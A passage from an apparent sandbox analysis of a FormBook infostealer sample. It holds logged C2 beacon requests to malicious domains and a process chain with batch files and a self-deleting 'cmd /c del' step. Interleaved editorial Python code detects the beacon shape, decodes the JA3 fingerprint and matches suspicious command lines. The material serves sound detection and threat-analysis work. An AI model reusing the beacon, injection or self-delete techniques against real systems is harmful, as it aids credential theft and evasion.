Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.ayco.sucks/ogpo?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&amp;6lR=6lV0">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.ayco.sucks Port 80</address></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49742 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 12:23:40.658060074 CEST | 4769 | OUT | GET /ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV0 HTTP/1.1
Host: www.vigipharx.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 12:23:40.797790051 CEST | 4770 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 11 Jun 2021 10:23:40 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60c03ab8-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49743 | 185.98.131.46 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 12:23:45.956536055 CEST | 4771 | OUT | GET /ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV0 HTTP/1.1
Host: www.plastictohydrogen.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 12:23:46.177726030 CEST | 4772 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Jun 2021 10:23:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.3.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=ab594f30faefbfad908548750f3c4e85; path=/
Vary: Host
Data Raw: 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 6b<!DOCTYPE html><html><head><title>404 Not Found</title></head><body>404 Not Found</body></html>0

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49752 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 12:24:22.546920061 CEST | 4909 | OUT | GET /ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV0 HTTP/1.1
Host: www.amplifierconsulting.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 12:24:22.687731028 CEST | 4910 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 11 Jun 2021 10:24:22 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60ba413e-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                       Session ID:5
                                                                       Source IP:192.168.2.3
                                                                       Source Port:49753
                                                                       Destination IP:34.102.136.180
                                                                       Destination Port:80
                                                                       Process:C:\Windows\explorer.exe
                                                                       Timestamp | kBytes transferred | Direction | Data
                                                                       Jun 11, 2021 12:24:27.820296049 CEST | 4910 | OUT | GET /ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV0 HTTP/1.1
                                                                      Host: www.plaquitasparamascota.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                       Jun 11, 2021 12:24:27.958565950 CEST | 4911 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 11 Jun 2021 10:24:27 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60c03ab8-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
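The two sessions above share one request shape: a GET from explorer.exe to a short single-directory path, one long base64-like query value plus one short second parameter, only Host and Connection: close as headers, no User-Agent, and seven NUL bytes after the header block. The check below is an added example, not part of the Joe Sandbox report: it parses the captured request text and counts those indicators. The request is reconstructed from session 5 as logged; the contrasting browser request, the regular expressions and the threshold of four indicators are the editor's assumptions.

```python
"""Heuristic check for the beacon shape seen in the captured sessions."""
import re
from urllib.parse import urlsplit

# Reconstructed from the request logged in session 5 (headers as shown; the
# seven NUL bytes are the "Data Raw" the log shows after the headers).
BEACON_REQUEST = (
    "GET /ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V"
    "&6lR=6lV0 HTTP/1.1\r\n"
    "Host: www.plaquitasparamascota.com\r\n"
    "Connection: close\r\n"
    "\r\n" + "\x00" * 7
)

# Constructed ordinary browser request for contrast (not from the report).
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

# Editor's thresholds: one short directory, and a query value of 40+ base64 chars.
SHORT_DIR_PATH = re.compile(r"^/[A-Za-z0-9]{2,8}/$")
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, raw query pairs, headers, body.
    Query values are kept undecoded: '+' and '/' are part of the encoded blob,
    so form-style decoding would corrupt them."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    query = {}
    for pair in parts.query.split("&") if parts.query else []:
        key, _, value = pair.partition("=")
        query[key] = value
    return {"method": method, "path": parts.path, "query": query,
            "headers": headers, "body": body}


def beacon_indicators(req: dict) -> list:
    """Return the matched indicators; an empty list means nothing matched."""
    hits = []
    if req["method"] == "GET" and SHORT_DIR_PATH.match(req["path"]):
        hits.append("short single-directory path")
    if any(BASE64_BLOB.match(v) for v in req["query"].values()):
        hits.append("long base64-like query value")
    if len(req["query"]) == 2:
        hits.append("exactly two query parameters")
    if "user-agent" not in req["headers"]:
        hits.append("no User-Agent header")
    if req["headers"].get("connection", "").lower() == "close":
        hits.append("Connection: close")
    if req["body"] and set(req["body"]) == {"\x00"}:
        hits.append("body is NUL padding only")
    return hits


def is_probable_beacon(raw: str, threshold: int = 4) -> bool:
    """Flag a request when at least `threshold` indicators match (editor's choice)."""
    return len(beacon_indicators(parse_request(raw))) >= threshold
```

The 403 responses do not mean the C2 was down: with FormBook the operator's server discards requests it cannot validate, and the same Host/path pattern is rotated across the decoy and real domains in the configuration, so the request shape rather than the response is what to alert on.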


                                                                      HTTPS Packets

                                                                       Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                                                                       Jun 11, 2021 12:22:13.791188955 CEST | 162.159.135.233 | 443 | 192.168.2.3 | 49716 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
                                                                       Certificate chain presented in this session:
                                                                       Subject | Issuer | Not Before | Not After
                                                                       CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Tue Jan 19 01:00:00 CET 2021 | Wed Jan 19 00:59:59 CET 2022
                                                                       CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025
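The JA3 column is the MD5 of the comma-separated string next to it, and the string itself is readable once split into its five fields. The following is an added example, not code from the report: it decomposes the fingerprint and recomputes the digest. The string and the reported digest are copied from the table; the JA3 construction (MD5 over "version,ciphers,extensions,curves,pointformats") is the published definition, and the extension numbers are from the IANA TLS registry.

```python
"""Decompose and recompute the JA3 client fingerprint from the HTTPS table."""
import hashlib

# Copied from the HTTPS Packets table above.
JA3_STRING = ("771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-"
              "49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0")
REPORTED_DIGEST = "37f463bf4616ecd445d4a1937da06e19"

# IANA TLS extension numbers referenced when reading a JA3 string.
EXT_SNI, EXT_ALPN, EXT_RENEGOTIATION_INFO = 0, 16, 65281


def split_ja3(fingerprint: str) -> dict:
    """Break the JA3 string into version and four integer lists."""
    version, ciphers, extensions, curves, point_formats = fingerprint.split(",")
    to_ints = lambda field: [int(x) for x in field.split("-")] if field else []
    return {
        "version": int(version),
        "ciphers": to_ints(ciphers),
        "extensions": to_ints(extensions),
        "curves": to_ints(curves),
        "point_formats": to_ints(point_formats),
    }


def ja3_digest(fingerprint: str) -> str:
    """JA3 digest as published: MD5 of the raw comma-separated string."""
    return hashlib.md5(fingerprint.encode("ascii")).hexdigest()


def is_grease(value: int) -> bool:
    """GREASE values (RFC 8701) have both bytes equal and a low nibble of 0xa."""
    return (value >> 8) == (value & 0xFF) and (value & 0x0F) == 0x0A


def describe(fingerprint: str) -> dict:
    """Facts a triager wants from the fingerprint without a lookup service."""
    f = split_ja3(fingerprint)
    return {
        "tls_version_hex": hex(f["version"]),      # 0x303 is TLS 1.2
        "cipher_count": len(f["ciphers"]),
        "ciphers_hex": [f"0x{c:04x}" for c in f["ciphers"]],
        "offers_sni": EXT_SNI in f["extensions"],
        "offers_alpn": EXT_ALPN in f["extensions"],
        "has_grease": any(is_grease(v) for v in f["ciphers"] + f["extensions"]),
        "digest_matches_report": ja3_digest(fingerprint) == REPORTED_DIGEST.lower(),
    }
```

A 19-cipher TLS 1.2 hello with SNI but no ALPN and no GREASE values points to a native Windows TLS client rather than a browser, and such a digest is shared by many legitimate Windows programs. Treat it as a pivot to correlate with the process and destination, not as an indicator on its own.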

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior


                                                                      System Behavior

                                                                      General

                                                                      Start time:12:22:06
                                                                      Start date:11/06/2021
                                                                      Path:C:\Users\user\Desktop\3.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\3.exe'
                                                                      Imagebase:0x400000
                                                                      File size:1081696 bytes
                                                                      MD5 hash:21F077FA0E739F6174E2452ABC30BB7C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.217187289.0000000003088000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.215422596.0000000003068000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.215851322.0000000003084000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.215763701.000000000306C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.215525181.0000000003080000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.216098891.0000000003098000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.215441416.0000000003084000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      Reputation:low

                                                                      General

                                                                      Start time:12:22:26
                                                                      Start date:11/06/2021
                                                                      Path:C:\Users\user\Desktop\3.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\3.exe
                                                                      Imagebase:0x400000
                                                                      File size:1081696 bytes
                                                                      MD5 hash:21F077FA0E739F6174E2452ABC30BB7C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:12:22:27
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                                                                      Imagebase:0xbd0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:28
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6b2800000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:33
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff714890000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:29
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                                                                      Imagebase:0xbd0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:30
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6b2800000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:51
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                      Imagebase:0x830000
                                                                      File size:29184 bytes
                                                                      MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:22:56
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\3.exe'
                                                                      Imagebase:0xbd0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:56
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6b2800000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
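The process listing above is enough to write command-line rules for this chain: two batch files run out of C:\Users\Public (cmd /c for Trast.bat, cmd /K for UKO.bat), the sample image started a second time before the injection into explorer.exe, a 32-bit ipconfig.exe started with its bare path and no arguments, and a final cmd /c del of the sample. The rules below are an added example, not part of the Joe Sandbox report. The event tuples are copied from the General blocks; the regular expressions, the rule names and the assumption that the earliest start is the submitted sample are the editor's.

```python
"""Command-line rules over the process starts listed under System Behavior."""
import re

# (start time, image path, command line) exactly as shown on the page.
EVENTS = [
    ("12:22:06", "C:\\Users\\user\\Desktop\\3.exe", "'C:\\Users\\user\\Desktop\\3.exe'"),
    ("12:22:26", "C:\\Users\\user\\Desktop\\3.exe", "C:\\Users\\user\\Desktop\\3.exe"),
    ("12:22:27", "C:\\Windows\\SysWOW64\\cmd.exe",
     "C:\\Windows\\system32\\cmd.exe /c ''C:\\Users\\Public\\Trast.bat' '"),
    ("12:22:28", "C:\\Windows\\System32\\conhost.exe",
     "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
    ("12:22:29", "C:\\Windows\\SysWOW64\\cmd.exe",
     "C:\\Windows\\system32\\cmd.exe /K C:\\Users\\Public\\UKO.bat"),
    ("12:22:33", "C:\\Windows\\explorer.exe", ""),
    ("12:22:51", "C:\\Windows\\SysWOW64\\ipconfig.exe", "C:\\Windows\\SysWOW64\\ipconfig.exe"),
    ("12:22:56", "C:\\Windows\\SysWOW64\\cmd.exe", "/c del 'C:\\Users\\user\\Desktop\\3.exe'"),
]

# Editor's rules. The report renders double quotes as single quotes, so the
# batch pattern tolerates any run of quotes before the script path.
BATCH_FROM_PUBLIC = re.compile(r"cmd\.exe\s+/[ck]\s+'*(C:\\Users\\Public\\[^' ]+\.bat)", re.I)
DELETE_EXE = re.compile(r"/c\s+del\s+'?([^']+\.exe)'?", re.I)
WOW64_DIR = "c:\\windows\\syswow64\\"


def evaluate(events):
    """Return (rule, start time, detail) for every event that matches a rule.
    Assumption: the earliest start in a sandbox run is the submitted sample."""
    first_start = min(ts for ts, _, _ in events)
    sample = next(path for ts, path, _ in events if ts == first_start).lower()
    findings = []
    for ts, path, cmd in events:
        m = BATCH_FROM_PUBLIC.search(cmd)
        if m:
            findings.append(("batch_from_public", ts, m.group(1)))
        m = DELETE_EXE.search(cmd)
        if m and m.group(1).lower() == sample:
            # The dropper removing its own on-disk image after injection.
            findings.append(("dropper_self_delete", ts, m.group(1)))
        if path.lower() == sample and ts != first_start:
            # A second instance of the sample: the child that gets hollowed.
            findings.append(("sample_relaunched", ts, path))
        if path.lower().startswith(WOW64_DIR) and cmd.strip().lower() == path.lower():
            # A 32-bit system utility started with nothing but its own path,
            # which is how the injection target appears in this listing.
            findings.append(("bare_wow64_utility", ts, path))
    return findings
```

On its own the bare_wow64_utility rule is noisy (a user typing ipconfig matches it); it earns its place by co-occurring with the other three within a minute. Real endpoint telemetry would add the parent process, which this listing does not carry, and that would separate an interactive ipconfig from one spawned by explorer.exe.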

                                                                      Disassembly

                                                                      Code Analysis
